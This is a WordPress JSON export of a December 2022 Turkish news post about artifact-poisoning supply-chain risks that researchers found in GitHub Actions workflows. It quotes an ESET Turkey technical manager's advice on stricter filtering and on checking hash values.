{"id":2290,"date":"2022-12-06T10:26:04","date_gmt":"2022-12-06T07:26:04","guid":{"rendered":"https:\/\/sakarya.news\/?p=2290"},"modified":"2022-12-06T10:26:06","modified_gmt":"2022-12-06T07:26:06","slug":"yazmadigin-koda-guvenme","status":"publish","type":"post","link":"https:\/\/haber.kocaalibilisim.com\/index.php\/2022\/12\/06\/yazmadigin-koda-guvenme\/","title":{"rendered":"Yazmad\u0131\u011f\u0131n koda g\u00fcvenme"},"content":{"rendered":"\n<p><strong>Siber g\u00fcvenlik ara\u015ft\u0131rmac\u0131lar\u0131 GitHub Actions platformunda, sald\u0131rganlar\u0131n yaz\u0131l\u0131m projelerine k\u00f6t\u00fc ama\u00e7l\u0131 kod ekleyerek bir tedarik zinciri sald\u0131r\u0131s\u0131 ba\u015flatmalar\u0131n\u0131 sa\u011flayabilecek riskler belirlediler.<\/strong><\/p>\n\n\n\n<p>Kodlar\u0131n GitHub Actions platformu taraf\u0131ndan depolanma \u015fekli, sald\u0131rganlar\u0131n bu par\u00e7alar\u0131 indirirken yeterli filtreleme ger\u00e7ekle\u015ftirmeyen (CI\/CD &#8211; s\u00fcrekli t\u00fcmle\u015ftirme ve s\u00fcrekli teslim) i\u015f ak\u0131\u015flar\u0131yla yaz\u0131l\u0131m projelerine k\u00f6t\u00fc ama\u00e7l\u0131 kod eklemesine olanak tan\u0131yabiliyor. Ara\u015ft\u0131rmac\u0131lar, savunmas\u0131z binlerce depo taraf\u0131ndan kullan\u0131lan, birka\u00e7 pop\u00fcler kod par\u00e7ac\u0131\u011f\u0131 indirme komut dosyas\u0131 tespit ettiler. Artefact zehirlenmesi olarak tan\u0131mlanan b\u00fcy\u00fck bir risk ile ilgili uyar\u0131larda bulundular. Artefact zehirlenmesinde sald\u0131rganlar me\u015fru bir yap\u0131y\u0131 k\u00f6t\u00fc ama\u00e7l\u0131 bir kodla de\u011fi\u015ftirerek tedarik zinciri sald\u0131r\u0131s\u0131 ba\u015flatabiliyorlar.&nbsp;<\/p>\n\n\n\n<p><strong>ESET T\u00fcrkiye Teknik M\u00fcd\u00fcr\u00fc G\u00fcrcan \u015een\u00a0<\/strong>channelasia.tech\u2019de\u00a0de yer alan konu ile ilgili \u015fu a\u00e7\u0131klamada bulundu:<em>\u00a0<\/em>&#8220;Tedarik zinciri sald\u0131r\u0131lar\u0131 genellikle o kadar h\u0131zl\u0131d\u0131r ki, kurban herhangi bir \u015feyin ger\u00e7ekle\u015fti\u011finin fark\u0131nda bile olamadan sald\u0131rganlar i\u00e7eri girip \u00e7\u0131kabilirler. Sald\u0131rganlar\u0131n me\u015fru kodu kendi k\u00f6t\u00fc ama\u00e7l\u0131 kodlar\u0131yla de\u011fi\u015ftirdi\u011fi artefact zehirlenmesinde, kodun ba\u015fka biri taraf\u0131ndan g\u00f6zden ge\u00e7irilmi\u015f olabilece\u011fine inan\u0131ld\u0131\u011f\u0131 i\u00e7in sorun b\u00fcy\u00fcyor. Kod kontrol edilmedi\u011finden dolay\u0131 bir tedarik zinciri boyunca farkedilmiyor. \u00a0GitHub t\u00fcm d\u00fcnyada kullan\u0131l\u0131yor ve varsay\u0131lan bir koruma seviyesi bulunuyor. Ancak bu, kodun her zaman k\u00f6t\u00fc niyetli i\u00e7erikten temiz olaca\u011f\u0131 anlam\u0131na veya bu sorunun ilk defa olu\u015ftu\u011fu anlam\u0131na gelmiyor. Bu nedenle, g\u00fcvende kalmak i\u00e7in i\u015f ak\u0131\u015flar\u0131n\u0131 daha s\u0131k\u0131 filtreleme ile g\u00fcncellenmesi gerekiyor. Hash de\u011ferleri, tutars\u0131zl\u0131klar\u0131 h\u0131zl\u0131 bir \u015fekilde tespit edebilme konusunda kullan\u0131c\u0131ya fayda sa\u011flayabilir. Dikkatli ve platformda uyan\u0131k olmak genellikle en iyi korunma y\u00f6ntemidir. Ayr\u0131ca, geli\u015ftiriciler hi\u00e7bir koda, \u00f6zellikle de yazmad\u0131klar\u0131 koda asla g\u00fcvenmemeliler.&#8221;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Siber g\u00fcvenlik ara\u015ft\u0131rmac\u0131lar\u0131 GitHub Actions platformunda, sald\u0131rganlar\u0131n yaz\u0131l\u0131m projelerine k\u00f6t\u00fc ama\u00e7l\u0131 kod ekleyerek bir tedarik zinciri sald\u0131r\u0131s\u0131 ba\u015flatmalar\u0131n\u0131 sa\u011flayabilecek riskler belirlediler. Kodlar\u0131n GitHub Actions platformu taraf\u0131ndan depolanma \u015fekli, sald\u0131rganlar\u0131n bu par\u00e7alar\u0131 indirirken yeterli filtreleme ger\u00e7ekle\u015ftirmeyen (CI\/CD &#8211; s\u00fcrekli t\u00fcmle\u015ftirme ve s\u00fcrekli teslim) i\u015f ak\u0131\u015flar\u0131yla yaz\u0131l\u0131m projelerine k\u00f6t\u00fc ama\u00e7l\u0131 kod eklemesine olanak tan\u0131yabiliyor. Ara\u015ft\u0131rmac\u0131lar, savunmas\u0131z binlerce [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2291,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,11],"tags":[1036,2265,2694],"class_list":["post-2290","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-guncel","category-teknoloji","tag-github-actions","tag-siber-guvenlik","tag-yazmadigin-koda-guvenme"],"_links":{"self":[{"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/posts\/2290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/comments?post=2290"}],"version-history":[{"count":1,"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/posts\/2290\/revisions"}],"predecessor-version":[{"id":2292,"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/posts\/2290\/revisions\/2292"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/media\/2291"}],"wp:attachment":[{"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/media?parent=2290"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/categories?post=2290"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/haber.kocaalibilisim.com\/index.php\/wp-json\/wp\/v2\/tags?post=2290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}